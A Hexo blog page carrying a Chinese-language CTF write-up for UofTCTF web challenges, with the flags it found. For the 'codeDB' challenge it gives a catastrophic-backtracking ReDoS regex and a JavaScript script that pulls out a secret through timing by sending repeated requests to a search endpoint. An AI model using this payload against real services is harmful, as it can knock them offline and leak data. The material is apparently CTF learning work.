<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>UotFCTF-web | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="hello! this is wp for* &#x2F;&#x2F; web 1. Scavenger Hunt&lt;!-- part 1: uoftctf{ju57_k33p_ --&gt;  首先scavenger hunt是翻译为寻宝游戏，我们根据上面源码得到flag1 1&lt;link rel&#x3D;&quot;stylesheet&quot; href&#x3D;&quot;&#x2F;styles.css">
<meta property="og:type" content="article">
<meta property="og:title" content="UotFCTF-web">
<meta property="og:url" content="http://example.com/2025/11/14/UotFCTF-web/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="hello! this is wp for* &#x2F;&#x2F; web 1. Scavenger Hunt&lt;!-- part 1: uoftctf{ju57_k33p_ --&gt;  首先scavenger hunt是翻译为寻宝游戏，我们根据上面源码得到flag1 1&lt;link rel&#x3D;&quot;stylesheet&quot; href&#x3D;&quot;&#x2F;styles.css">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-11-14T03:47:03.000Z">
<meta property="article:modified_time" content="2025-11-14T03:52:20.091Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 8.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-UotFCTF-web" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/11/14/UotFCTF-web/" class="article-date">
  <time class="dt-published" datetime="2025-11-14T03:47:03.000Z" itemprop="datePublished">2025-11-14</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      UotFCTF-web
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p>hello! this is wp for* &#x2F;&#x2F; <strong>web</strong></p>
<h2 id="1-Scavenger-Hunt"><a href="#1-Scavenger-Hunt" class="headerlink" title="1. Scavenger Hunt"></a><em>1. Scavenger Hunt</em></h2><pre><code>&lt;!-- part 1: uoftctf{ju57_k33p_ --&gt;
</code></pre>
<p><em>首先scavenger hunt是翻译为寻宝游戏，我们根据上面源码得到flag1</em></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;link rel=<span class="string">&quot;stylesheet&quot;</span> href=<span class="string">&quot;/styles.css&quot;</span>&gt; script src=<span class="string">&quot;/app.min.js&quot;</span>&gt;</span><br></pre></td></tr></table></figure>

<p><strong>link rel是声明资源与文档关系，herf指定文件地址</strong>，<em>所以在源码界面点击该地址，跳转网页得到flag5</em></p>
<p><strong>script src是用于指定外部Javascript的url地址</strong>，<em>点击提示# sourceMappingURL&#x3D;app.min.js.map，在url 输入得到flag7</em></p>
<p><em>打开爬虫文件robot得到flag4,访问&#x2F;hidden_admin_panel发现被阻止，通过改cookie得到flag3</em></p>
<p><em>flag2通过看请求头找到,然后找不到flag6,看wp发现其实在改cookie时已经得到，只是没有页面刷新。。</em></p>
<h2 id="2-codeDB"><a href="#2-codeDB" class="headerlink" title="2.codeDB"></a><em>2.codeDB</em></h2><p><em>进入后看到搜索框，感觉像sql注入，或类似的方法，简单试了一下，并不行，用AI翻译了一下代码</em></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;input type=<span class="string">&quot;text&quot;</span> id=<span class="string">&quot;query&quot;</span> class=<span class="string">&quot;form-control&quot;</span> placeholder=<span class="string">&quot;Enter search query (use /regex/ for regex search)&quot;</span> required&gt;</span><br></pre></td></tr></table></figure>

<p>type&#x3D;”text” - 文本输入框</p>
<p>id&#x3D;”query” - 标识这个输入用于查询</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;Enter search query (use /regex/ for regex search)&quot;</span></span><br></pre></td></tr></table></figure>

<p><strong>翻译”输入搜索查询（使用 &#x2F;regex&#x2F; 进行正则表达式搜索）”</strong></p>
<p><em>说明这个搜索功能支持正则表达式，正则表达式的格式是用斜杠包围：&#x2F;regex&#x2F;，百度一下，正则表达式通常在服务器端执行</em></p>
<ul>
<li><p>服务器端正则可能存在<strong>REDOS漏洞</strong>，这是攻击的入口点分析到这，发现除了正则表达式这个词涉及知识不咋懂，还冒出个redos，搜搜</p>
</li>
<li><p><strong>正则表达式</strong>：是编程里的文本处理工具，主要应用于字符串匹配，替换等</p>
</li>
<li><p><strong>REDOS攻击</strong>：在某些情况下，正则表达式引擎在尝试匹配恶意构造的输入时可能会陷入无限循环，消耗大量计算资源，从而导致服务响应缓慢甚至崩溃。这种攻击方式就是ReDoS</p>
</li>
</ul>
<p>而解题思路就是对该题进行尝试，通过输入代码，检查响应时间，找出flag,(简称爆破，即生成一系列可能的字符串，测试每一个输入与正则表达式的匹配速度，就是时间，然后一个一个拼出flag），也有特殊的名字<strong>时间盲注</strong>，然后试了下，解不出，去看了下wp</p>
<p></p>
<p>payload &#x3D; &#x2F;(((((((((.<em>)</em>)<em>)</em>)<em>)</em>)<em>)</em>)*)!!!!!!!&#x2F;就用这个去爆破，让时间多于1s的字母组合得到flag</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">async function <span class="title function_">getFlag</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="type">const</span> <span class="variable">chars</span> <span class="operator">=</span> <span class="string">&#x27;abcdefghijklmnopqrstuvwxyz0123456789&#123;&#125;_-&#x27;</span>;</span><br><span class="line">    <span class="type">let</span> <span class="variable">flag</span> <span class="operator">=</span> <span class="string">&#x27;uoftctf&#123;&#x27;</span>;</span><br><span class="line">    function <span class="title function_">escapeRegex</span><span class="params">(str)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> str.replace(/[.*+?^$&#123;&#125;()|[\]\\]/g, <span class="string">&#x27;\\$&amp;&#x27;</span>);&#125;</span><br><span class="line">    async function <span class="title function_">test</span><span class="params">(payload)</span> &#123;</span><br><span class="line">        <span class="type">const</span> <span class="variable">start</span> <span class="operator">=</span> performance.now();</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            await <span class="title function_">fetch</span><span class="params">(<span class="string">&#x27;/search&#x27;</span>, &#123;</span></span><br><span class="line"><span class="params">                method: <span class="string">&#x27;POST&#x27;</span>,</span></span><br><span class="line"><span class="params">                headers: &#123;<span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span>&#125;,</span></span><br><span class="line"><span class="params">                body: JSON.stringify(&#123;query: payload, language: <span class="string">&#x27;All&#x27;</span>&#125;)</span></span><br><span class="line">            &#125;);</span><br><span class="line">            <span class="keyword">return</span> (performance.now() - start) / <span class="number">1000</span>;</span><br><span class="line">        &#125; <span class="keyword">catch</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;&#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">while</span> (!flag.endsWith(<span class="string">&#x27;&#125;&#x27;</span>)) &#123;</span><br><span class="line">        <span class="type">let</span> <span class="variable">found</span> <span class="operator">=</span> <span class="literal">false</span>;</span><br><span class="line">        <span class="keyword">for</span> (let <span class="type">char</span> of chars) &#123;</span><br><span class="line">            <span class="type">const</span> <span class="variable">guess</span> <span class="operator">=</span> escapeRegex(flag + <span class="type">char</span>);</span><br><span class="line">            <span class="type">const</span> <span class="variable">payload</span> <span class="operator">=</span> `/^(?=$&#123;guess&#125;)(((((((((.*)*)*)*)*)*)*)*)*)!!!!!!!$/`;</span><br><span class="line">            <span class="type">const</span> <span class="variable">time</span> <span class="operator">=</span> await <span class="title function_">test</span><span class="params">(payload)</span>;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (time &gt; <span class="number">0.8</span>) &#123;</span><br><span class="line">                flag += <span class="type">char</span>;</span><br><span class="line">                console.log(<span class="string">&#x27;Found:&#x27;</span>, flag);</span><br><span class="line">                found = <span class="literal">true</span>;</span><br><span class="line">                <span class="keyword">break</span>;&#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (!found) <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">if</span> (flag.length &gt; <span class="number">50</span>) <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    console.log(<span class="string">&#x27;Final flag:&#x27;</span>, flag);</span><br><span class="line">    <span class="keyword">return</span> flag;</span><br><span class="line">&#125;</span><br><span class="line">getFlag();</span><br></pre></td></tr></table></figure>

<p></p>
<p>最后🎉 Found complete flag: uoftctf{why_15_my_4pp_l4661n6_50_b4dly??}</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/11/14/UotFCTF-web/" data-id="cuid4PO2oRg_7gkm-Veq9t6bL" data-title="UotFCTF-web" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2025/11/14/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/11/">November 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/11/14/UotFCTF-web/">UotFCTF-web</a>
          </li>
        
          <li>
            <a href="/2025/11/14/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>